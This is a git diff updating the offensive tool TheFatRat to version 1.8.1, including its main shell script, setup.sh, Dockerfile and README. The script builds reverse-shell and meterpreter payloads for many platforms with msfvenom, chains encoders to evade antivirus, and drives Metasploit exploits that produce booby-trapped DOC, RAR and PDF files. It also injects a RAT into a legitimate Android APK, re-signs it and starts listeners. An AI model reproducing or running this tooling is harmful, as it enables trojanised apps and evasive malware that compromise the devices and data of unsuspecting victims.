diff --git a/CHANGELOG.md b/CHANGELOG.md index e8b2042..c011ed1 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,5 +1,9 @@ ## CHANGELOG +* v1.8.1 - added possibility to configure metasploit , backdoor-factory & searchsploit with manual inputs + +* - added more packages instalations needed for non-pentest distribution & some bugs fixed + * v1.8 - add file pumper in TFR * v1.8 - Backdoor with c program for meterpreter reverse_tcp * v1.8 - Metasploit staging protocol ( c program ) diff --git a/Dockerfile b/Dockerfile index df69df3..2798c9d 100644 --- a/Dockerfile +++ b/Dockerfile @@ -17,7 +17,20 @@ RUN echo 'APT::Get::Install-Recommends "false";' >> /etc/apt/apt.conf \ backdoor-factory \ monodevelop \ ruby \ - apache2 + apache2 \ + upx-ucl \ + xterm \ + gnome-terminal \ + default-jre \ + default-jdk \ + unzip \ + aapt \ + apktool \ + dex2jar \ + zlib1g-dev \ + libmagickwand-dev \ + imagemagick \ + zipalign WORKDIR /root/TheFatRat ADD . ./ diff --git a/README.md b/README.md index 33458a7..08ecf15 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ #TheFatRat ( Unit for bypass av ) -##Update: Version 1.8 +##Update: Version 1.8.1 ##Codename: Spark What is TheFatRat ?? @@ -87,7 +87,8 @@ And it's up & running. ## :heavy_exclamation_mark: Requirements -- A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux ) +- A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling + Cyborg / Parrot / Dracos / BackTrack / Backbox / Devuan and another operating system ( linux ) - Must install metasploit framework diff --git a/config/readme.md b/config/readme.md new file mode 100644 index 0000000..5df390d --- /dev/null +++ b/config/readme.md @@ -0,0 +1,4 @@ +----------------------------------------- +|Folder for FatRat configuration files .| +| Do Not Remove this file . | +----------------------------------------- diff --git a/fatrat b/fatrat index a2003df..d512242 100644 --- a/fatrat +++ b/fatrat @@ -22,23 +22,22 @@ white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' BlueF='\e[1;34m' - - +path=`pwd` #Checking -[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; } +[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; } resize -s 33 84 > /dev/null clear -file="config.path" +file="config/config.path" if [ -f "$file" ] then -msfconsole=`sed -n 5p config.path` -msfvenom=`sed -n 6p config.path` -backdoor=`sed -n 7p config.path` -searchsploit=`sed -n 8p config.path` +msfconsole=`sed -n 5p $file` +msfvenom=`sed -n 6p $file` +backdoor=`sed -n 7p $file` +searchsploit=`sed -n 8p $file` else - echo "Configuration file does not exists , run setup.sh first ." + echo "Configuration file does not exists , run setup.sh first ." exit 1 fi @@ -113,7 +112,7 @@ cat << ! # Some Variables ##################### path=`pwd` -Versi=1.8 +Versi=1.8.1 codename=Sparta OS=`uname` # distro=`awk '{print $1}' /etc/issue` @@ -135,7 +134,9 @@ out='output/ip.txt' pump='tools/pump.py' reverse1='temp/reverse1.c' stag='temp/stag.c' - +apkconfig=$path/config/apk.tmp +unzip=unzip +temp=$path/temp ################################################### # CTRL C ################################################### @@ -158,7 +159,7 @@ exit ######################### -#CHECK DEPENDICS +#CHECK DEPENDICIES ######################### echo -e $cyan" ____ _ _ _ " echo " / ___| |__ ___ ___| | _(_)_ __ __ _ " @@ -174,10 +175,10 @@ if [ $(id -u) != "0" ]; then echo [!]::[Check Dependencies] ; sleep 2 - echo [✔]::[Check User]: $USER ; - echo [✔]::[Distro]: $distro ; + echo [✔]::[Check User]: $USER ; + echo [✔]::[Distro]: $distro ; sleep 1 - echo [x]::[not root]: you need to be [root] to run this script.; + echo [x]::[not root]: you need to be [root] to run this script.; echo "" sleep 1 exit @@ -187,8 +188,8 @@ else echo [!]::[Check Dependencies]: ; sleep 1 - echo [✔]::[Distro]: $distro ; - echo [✔]::[Check User]: $USER ; + echo [✔]::[Distro]: $distro ; + echo [✔]::[Check User]: $USER ; fi @@ -211,7 +212,7 @@ fi # check apache if exists which apache2 > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo [✔]::[Apache2 Server $distro ]: installation found!; + echo [✔]::[Apache2 Server $distro ]: installation found!; else echo [x]::[warning]:this script require apache2 to work ; @@ -251,12 +252,12 @@ sleep 2 # check if msfvenom exists which $msfvenom > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo [✔]::[Msfvenom]: installation found!; + echo [✔]::[Msfvenom]: installation found!; else echo [x]::[warning]:this script require msfvenom installed to work ; echo "" - echo [!]::Run setup.sh to install metasploit-framework ; + echo [!]::Run setup.sh to install metasploit-framework ; sleep 3 exit 1 fi @@ -559,7 +560,7 @@ echo "" spinlong echo "" echo "" - $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf + $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf echo -e "Shell Saved To output Folder " elif test $fatrat1 == '2' then @@ -574,7 +575,7 @@ echo "" spinlong echo "" echo "" - $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe + $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe echo -e "Shell Saved To output Folder " elif test $fatrat1 == '3' then @@ -589,7 +590,7 @@ echo "" spinlong echo "" echo "" - $msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk + $msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk echo -e "Shell Saved To output Folder " elif test $fatrat1 == '4' then @@ -604,7 +605,7 @@ echo "" spinlong echo "" echo "" - $msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho + $msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho echo -e "Shell Saved To outputFolder " elif test $fatrat1 == '5' then @@ -619,7 +620,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php + $msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php echo -e "Shell Saved To output Folder " elif test $fatrat1 == '6' then @@ -634,7 +635,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp + $msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp echo -e "Shell Saved To output Folder " elif test $fatrat1 == '7' then @@ -649,7 +650,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp + $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp echo -e "Shell Saved To output Folder " elif test $fatrat1 == '8' then @@ -664,7 +665,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war + $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war echo -e "Shell Saved To output Folder " elif test $fatrat1 == '9' then @@ -679,7 +680,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py + $msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py echo -e "Shell Saved To output Folder " elif test $fatrat1 == '10' then @@ -694,7 +695,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh + $msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh echo -e "Shell Saved To output Folder " elif test $fatrat1 == '11' then @@ -709,7 +710,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl + $msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl echo -e "Shell Saved To output Folder " elif test $fatrat1 == '12' @@ -733,9 +734,9 @@ echo "" gboor spinlong echo "" - xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1 + xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" echo "" - mv ~/.msf4/local/$fira.doc $path/output/$fira.doc + mv ~/.msf4/local/$fira.doc $path/output/$fira.doc echo -e $okegreen"" echo -e $yellow" Backdoor doc Saved To output Folder " echo "" @@ -766,9 +767,9 @@ echo "" gboor spinlong echo "" - xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1 + xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" echo "" - mv ~/.msf4/local/$fira $path/output/$fira + mv ~/.msf4/local/$fira $path/output/$fira echo -e $okegreen"" echo -e $yellow" Backdoor Saved To output Folder " echo "" @@ -834,8 +835,8 @@ echo -e $okegreen" ============================================================ echo set LPORT $uservar >> "temp/meterpreter_linux.rc" echo set ExitOnSession false >> "temp/meterpreter_linux.rc" echo exploit -j >> "temp/meterpreter_linux.rc" - xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc" & - clear + xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc" + clear elif test $fatrat1 == '2' #Windows then rm temp/*.rc > /dev/null 2>&1 @@ -852,7 +853,7 @@ echo -e $okegreen" ============================================================ echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc" echo set ExitOnSession false >> "temp/meterpreter_windows.rc" echo exploit -j >> "temp/meterpreter_windows.rc" - xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc" & + xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc" clear elif test $fatrat1 == '3' #Mac then @@ -867,7 +868,7 @@ echo -e $okegreen" ============================================================ echo set LPORT $uservar >> "temp/meterpreter_mac.rc" echo set ExitOnSession false >> "temp/meterpreter_mac.rc" echo exploit -j >> "temp/meterpreter_mac.rc" - xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc" & + xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc" clear elif test $fatrat1 == '4' #Android @@ -884,7 +885,7 @@ echo -e $okegreen" ============================================================ echo set LPORT $uservar >> "temp/meterpreter_android.rc" echo set ExitOnSession false >> "temp/meterpreter_android.rc" echo exploit -j >> "temp/meterpreter_android.rc" - xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc" & + xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc" clear elif test $fatrat1 == '5' @@ -927,7 +928,12 @@ echo -e $okegreen"[ ]$red Embed a Metasploit Payload in an original . echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]" echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]" echo "" +echo "Cleaning Temp files" +rm -rf output/* +sleep 2 +echo "Done!" echo -e $okegreen"" +sleep 1 echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" @@ -936,7 +942,22 @@ read yourport echo "" echo -ne $okegreen "Located Original Apk file for embed (example:$path/PE/instagram.apk) :" ;tput sgr0 read copyfile -cp $copyfile $path/output/fatrat.apk +cp $copyfile $path/output/fatrat.apk +apkt="$path/output/fatrat.apk" + +if [ ! -f $apkt ]; then + echo "[!] There was an error copying your APK to a temporary folder , make sure you wrote the right path " + read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key +menu + fi + +$unzip -l $apkt > /dev/null 2>&1 + rc=$? + if [ $rc != 0 ]; then + echo "[!] Original APK file specified is not valid" + read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key + menu + fi echo "" payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 echo "" @@ -946,16 +967,36 @@ spinlong gboor2 spinlong echo "" +sleep 1 +echo "Creating RAT payload with msfvenom" +$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/output/payload.apk +echo "Done !" +sleep 2 +echo "Starting the merging process of RAT with the APK you selected" echo "" +ruby $apkembed $path/output/fatrat.apk echo "" -echo "" -ruby $apkembed output/fatrat.apk -p $payload LHOST=$yourip LPORT=$yourport -echo "" -cp $path/output/output/fatrat_backdoored.apk backdoored/apkembed.apk -rm -rf $path/output/* -java -jar $bundle $cert $key $path/backdoored/apkembed.apk $path/output/Apk_embed_backdoor.apk -rm backdoored/apkembed.apk -echo -ne $okegreen" Your payload has been successfully embed with sign and is located here ( output folder ) " +echo "Merge completed of Payload with your APK" +sleep 2 +cp $path/output/fatrat_backdoored.apk $path/backdoored/apkembed.apk +echo "File copied with success to : $path/backdoored" +sleep 2 +echo "Removing temporary files from output" +sleep 2 +rm -rf $path/output/* +echo "Signing your APK file" +sleep 2 +java -jar $bundle $cert $key $path/backdoored/apkembed.apk Apk_embed_backdoor.apk +rm $path/backdoored/apkembed.apk +mv $path/Apk_embed_backdoor.apk $path/backdoored/output/ +outapk="$path/backdoored/output/Apk_embed_backdoor.apk" +if [ ! -f $outapk ]; then + echo "[!] APK Rat file was not found in : $path/backdoored/output/" + read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key +menu + fi +echo -ne $okegreen" Your payload has been successfully embed with sign and is located here : + $path/backdoored/output/Apk_embed_backdoor.apk" read loveyou echo clear @@ -1031,7 +1072,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo cat powershell_attack.txt sleep 2 rm unicorn.rc - mv powershell_attack.txt output/$fira.bat + mv powershell_attack.txt output/$fira.bat echo "" echo -e $okegreen"" echo -e "Backdoor Saved To output Folder " @@ -1199,7 +1240,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo echo " Wait for embed exe to pdf .... " xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $path/output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1 echo "" - mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf + mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf rm unicorn.rc powershell_attack.txt echo -e $okegreen"" echo -e $yellow" Backdoor PDF Saved To output Folder " @@ -1506,7 +1547,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo echo ' function();'>>$stag echo ' return 0;'>>$stag echo '}' >> $stag - $COMPILER $stag -o output/$fira.exe -lws2_32 + $COMPILER $stag -o output/$fira.exe -lws2_32 echo echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0 rm $stag @@ -1916,7 +1957,7 @@ menu () { elif test $fatrat == '2' then chmod +x powerfull.sh - xterm -fa monaco -fs 13 -bg black ./powerfull.sh + xterm -fa monaco -fs 13 -bg black ./powerfull.sh elif test $fatrat == '3' then @@ -1936,7 +1977,7 @@ menu () { spinlong2 echo "" echo -e $okegreen"" - $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe + $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe echo -e "Shell Saved To /backdoored/output/ press any key to continue" read bebeku clear @@ -1956,7 +1997,7 @@ menu () { elif test $fatrat == '8' then - xterm -fa monaco -fs 13 -bg black -e "$msfconsole" + xterm -fa monaco -fs 13 -bg black -e "$msfconsole" elif test $fatrat == '9' then @@ -2114,7 +2155,7 @@ echo elif test $fatrat == '2' then chmod +x powerfull.sh - xterm -fa monaco -fs 13 -bg black ./powerfull.sh + xterm -fa monaco -fs 13 -bg black ./powerfull.sh elif test $fatrat == '3' then @@ -2134,7 +2175,7 @@ echo spinlong2 echo "" echo -e $okegreen"" - $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe + $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe echo -e "Shell Saved To /backdoored/output/ press any key to continue" read bebeku clear @@ -2154,7 +2195,7 @@ echo elif test $fatrat == '8' then - xterm -fa monaco -fs 13 -bg black -e "$msfconsole" + xterm -fa monaco -fs 13 -bg black -e "$msfconsole" elif test $fatrat == '9' then diff --git a/logs/readme.md b/logs/readme.md new file mode 100644 index 0000000..751a20c --- /dev/null +++ b/logs/readme.md @@ -0,0 +1,3 @@ +******************************************************************************* +* All TheFatRat logs will be stored in this folder , do not delete this file! * +******************************************************************************* diff --git a/powerfull.sh b/powerfull.sh index 8e41be4..3a6db04 100644 --- a/powerfull.sh +++ b/powerfull.sh @@ -1,11 +1,11 @@ #!/bin/bash -file="config.path" +file="config/config.path" if [ -f "$file" ] then -msfconsole=`sed -n 5p config.path` -msfvenom=`sed -n 6p config.path` -backdoor=`sed -n 7p config.path` -searchsploit=`sed -n 8p config.path` +msfconsole=`sed -n 5p $file` +msfvenom=`sed -n 6p $file` +backdoor=`sed -n 7p $file` +searchsploit=`sed -n 8p $file` else echo "Configuration file does not exists , run setup.sh first ." exit 1 diff --git a/setup.sh b/setup.sh index ad495c7..c2016ba 100644 --- a/setup.sh +++ b/setup.sh @@ -8,11 +8,19 @@ sleep 4s rm -f /etc/apt/sources.list mv /etc/apt/sources.list.fatrat /etc/apt/sources.list echo "Your Original repository list was recovered. ;) ..... beginning setup" +echo "" +echo "Cleaning previous repositories cache & updating your repository ." +sudo apt-get clean && apt-get update -y sleep 3s else echo "" -fi +fi +path=`pwd` +log=$path/logs/setup.log +config=$path/config/config.path +#Removing any previous setup log created +rm -f $log # setup.sh Author : Edo maland ( Screetsec ) # Install all dependencies nedded # configuration all file for fixing all problem @@ -20,7 +28,7 @@ fi #Check root dulu [[ `id -u` -eq 0 ]] || { echo -e "\e[31m Must be root to run script"; exit 1; } -resize -s 30 73 > /dev/null +resize -s 30 73 > /dev/null 2>&1 clear @@ -48,11 +56,16 @@ echo " [ ] Use this script to configure fatrat [ ]" echo " [ ] Install all dependencies [ ]" echo " [ ]=================================================[ ]"; echo "" - +touch $log +echo "------------------------------------------------------" >> $log +echo "| Tools paths configured in (setup.sh) for TheFatRat |" >> $log +echo "------------------------------------------------------" >> $log +echo " " >> $log #check if xterm is installed which xterm > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Xterm.............................[ found ]" +which xterm >> $log 2>&1 sleep 2 else echo "" @@ -62,12 +75,14 @@ sleep 2 sudo apt-get install xterm -y clear echo "[ ✔ ] Done installing .... " +which xterm >> $log 2>&1 fi #check if zenity its installed which zenity > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Zenity............................[ found ]" +which zenity >> $log 2>&1 sleep 2 else echo "" @@ -77,18 +92,21 @@ sleep 2 echo "[ ! ] Installing zenity from your apt sources ]" xterm -T "☣ INSTALL ZENITY ☣" -geometry 100x30 -e "sudo apt-get install zenity -y" echo "[ ✔ ] Done installing .... " +which zenity >> $log 2>&1 fi # check if gcc exists which gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Gcc compiler......................[ found ]" +which gcc >> $log 2>&1 sleep 2 else echo "[ X ] gcc compiler -> not found ]" echo "[ ! ] Installing gcc from your apt sources ]" xterm -T "☣ INSTALL GCC COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install gcc -y" echo "[ ✔ ] Done installing .... " +which gcc >> $log 2>&1 sleep 2 fi @@ -96,12 +114,14 @@ fi which i586-mingw32msvc-gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Mingw32 Compiler..................[ found ]" +which i586-mingw32msvc-gcc >> $log 2>&1 sleep 2 else echo "[ X ] mingw32 compiler -> not found ]" echo "[ ! ] Installing zenity from your apt sources ]" xterm -T "☣ INSTALL MINGW32 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw32 -y" echo "[ ✔ ] Done installing .... " +which i586-mingw32msvc-gcc >> $log 2>&1 sleep 2 fi @@ -109,12 +129,14 @@ fi which monodevelop > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Monodevelop ......................[ found ]" +which monodevelop >> $log 2>&1 sleep 2 else echo "[ X ] Monodevelop -> not found ]" echo "[ ! ] Installing monodevelop from your apt sources ]" xterm -T "☣ INSTALL MONODEVELOP ☣" -geometry 100x30 -e "sudo apt-get install monodevelop -y" echo "[ ✔ ] Done installing ...." +which monodevelop >> $log 2>&1 sleep 2 fi @@ -122,12 +144,14 @@ fi which ruby > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Ruby .............................[ found ]" +which ruby >> $log 2>&1 sleep 2 else echo "[ X ] Ruby -> not found ]" echo "[ ! ] Installing ruby from your apt sources ]" xterm -T "☣ INSTALL RUBY ☣" -geometry 100x30 -e "sudo apt-get install ruby -y" echo "[ ✔ ] Done installing ...." +which ruby >> $log 2>&1 sleep 2 fi @@ -135,12 +159,14 @@ fi which apache2 > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Apache2 ..........................[ found ]" +which apache2 >> $log 2>&1 sleep 2 else echo "[ X ] Apache2 -> not found ]" echo "[ ! ] Installing apache2 from your apt sources ]" xterm -T "☣ INSTALL APACHE2 ☣" -geometry 100x30 -e "sudo apt-get install apache2 -y" echo "[ ✔ ] Done installing ...." +which apache2 >> $log 2>&1 sleep 2 fi @@ -150,12 +176,14 @@ fi which gnome-terminal > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Gnome Terminal....................[ found ]" +which gnome-terminal >> $log 2>&1 sleep 2 else echo "[ X ] Gnome-terminal-> not found ]" echo "[ ! ] Installing gnome-terminal from your apt sources ]" xterm -T "☣ INSTALL GNOME-TERMINAL ☣" -geometry 100x30 -e "sudo apt-get install gnome-terminal -y" echo "[ ✔ ] Done installing ...." +which gnome-terminal >> $log 2>&1 sleep 2 fi @@ -163,12 +191,95 @@ fi which upx > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] UPX Compressor....................[ found ]" +which upx >> $log 2>&1 sleep 2 else echo "[ X ] Upx compressor -> not found ]" echo "[ ! ] Installing upx-compressor from your apt sources ]" xterm -T "☣ INSTALL UPX COMPRESSOR ☣" -geometry 100x30 -e "sudo apt-get install upx-ucl -y" echo "[ ✔ ] Done installing ...." +which upx >> $log 2>&1 +sleep 2 +fi + +#Checking if keytool exists +which keytool > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo "[ ✔ ] Keytool (java)....................[ found ]" +which keytool >> $log 2>&1 +sleep 2 +else +echo "[ X ] Keytool (java) -> not found ]" +echo "[ ! ] Installing Java from your apt sources ]" +xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jre default-jdk -y " +echo "[ ✔ ] Done installing ...." +which keytool >> $log 2>&1 +sleep 2 +fi + +#Checking if Jarsigner exists +which jarsigner > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo "[ ✔ ] Jarsigner (java)..................[ found ]" +which jarsigner >> $log 2>&1 +sleep 2 +else +echo "[ X ] Jarsigner (java) -> not found ]" +echo "[ ! ] Installing Java from your apt sources ]" +xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jdk -y " +echo "[ ✔ ] Done installing ...." +which jarsigner >> $log 2>&1 +sleep 2 +fi + +#Checking if Unzip exists +which unzip > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo "[ ✔ ] Unzip.............................[ found ]" +which unzip >> $log 2>&1 +sleep 2 +else +echo "[ X ] Unzip -> not found ]" +echo "[ ! ] Installing Unzip from your apt sources ]" +xterm -T "☣ INSTALL UNZIP ☣" -geometry 100x30 -e "sudo apt-get install unzip -y " +echo "[ ✔ ] Done installing ...." +which unzip >> $log 2>&1 +sleep 2 +fi + +#Checking if Aapt exists +which aapt > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo "[ ✔ ] Aapt..............................[ found ]" +which aapt >> $log 2>&1 +sleep 2 +else +echo "[ X ] Aapt -> not found ]" +echo "[ ! ] Installing Aapt from your apt sources ]" +xterm -T "☣ INSTALL AAPT ☣" -geometry 100x30 -e "sudo apt-get install aapt -y " +echo "[ ✔ ] Done installing ...." +which aapt >> $log 2>&1 +sleep 2 +fi + +#Installing dependencies for Zipalign +echo "[ ! ] Installing Zipalign dependencies from your apt sources" +xterm -T "☣ INSTALL ZIPALING ☣" -geometry 100x30 -e "sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev -y " +echo "[ ✔ ] Done installing ...." +sleep 2 + +#Checking if Zipalign exists +which zipalign > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo "[ ✔ ] Zipalign..........................[ found ]" +which zipalign >> $log 2>&1 +sleep 2 +else +echo "[ X ] Zipalign -> not found ]" +echo "[ ! ] Installing Zipalign from your apt sources " +xterm -T "☣ INSTALL ZIPALIGN ☣" -geometry 100x30 -e "sudo apt-get install zipalign -y " +echo "[ ✔ ] Done installing ...." +which zipalign >> $log 2>&1 sleep 2 fi @@ -193,41 +304,63 @@ echo 'deb-src http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/s echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list sleep 2 -xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" +xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" >>$log 2>&1 #Checking if apktool exists which apktool > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Apktool...........................[ found ]" +which apktool >> $log 2>&1 sleep 2 else -echo "[ X ] Apktool -> not found ]" -echo "[ ! ] Installing apktool from Kali repositories ]" +echo "[ X ] Apktool -> not found " +echo "[ ! ] Installing apktool from Kali repositories " xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install apktool --force-yes -y" echo "[ ✔ ] Done installing ...." +which apktool >> $log 2>&1 sleep 2 fi +#Checking if dex2jar exists +which d2j-jar2dex > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo "[ ✔ ] Dex2Jar...........................[ found ]" +which d2j-jar2dex >> $log 2>&1 +sleep 2 +else +echo "[ X ] Dex2jar -> not found " +echo "[ ! ] Installing dex2jar from Kali repositories " +xterm -T "☣ INSTALL APKTOOOL ☣" -geometry 100x30 -e "sudo apt-get install dex2jar --force-yes -y" +echo "[ ✔ ] Done installing ...." +which d2j-jar2dex >> $log 2>&1 +sleep 2 +fi + +#installing dependencies for ruby script +echo "[ ! ] Installing dedepndencies for ruby script from Kali repositories " +xterm -T "☣ INSTALL DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install zlib1g-dev libmagickwand-dev imagemagick -y" +echo "[ ✔ ] Done installing ...." +sleep 2 # check if metasploit-framework its installed which msfconsole > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Metasploit-Framework..............[ found ]" # msf was detected , removing config file in case setup was already configured before -rm -f config.path +rm -f $config #Creating new config file based on last detection of msf -touch config.path -echo "********************************************************************************************************" >> config.path -echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> config.path -echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> config.path -echo "********************************************************************************************************" >> config.path -echo "msfconsole" >> config.path -echo "msfvenom" >> config.path +touch $config +echo "********************************************************************************************************" >> $config +echo "** Configuration Paths for TheFatRat , do not delete anything from this file or program will not work **" >> $config +echo "** if you need to 